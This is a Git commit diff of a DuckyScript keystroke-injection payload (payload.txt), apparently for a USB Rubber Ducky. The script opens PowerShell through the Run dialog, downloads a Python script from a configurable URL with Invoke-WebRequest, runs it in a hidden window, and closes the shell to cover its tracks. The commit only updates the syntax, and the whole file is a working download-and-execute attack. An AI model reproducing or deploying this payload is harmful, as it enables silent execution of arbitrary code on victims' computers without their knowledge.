Update payload.txt

pull/168/head
Kalani Helekunihi 2023-06-12 14:08:00 -04:00 committed by GitHub
parent f5495ea263
commit bfee640a04
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 12 deletions

View File

@ -14,22 +14,14 @@ REM - Internet Connection
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
DEFAULT_DELAY 500
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRINGLN powershell
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
DELAY 1000
ALT F4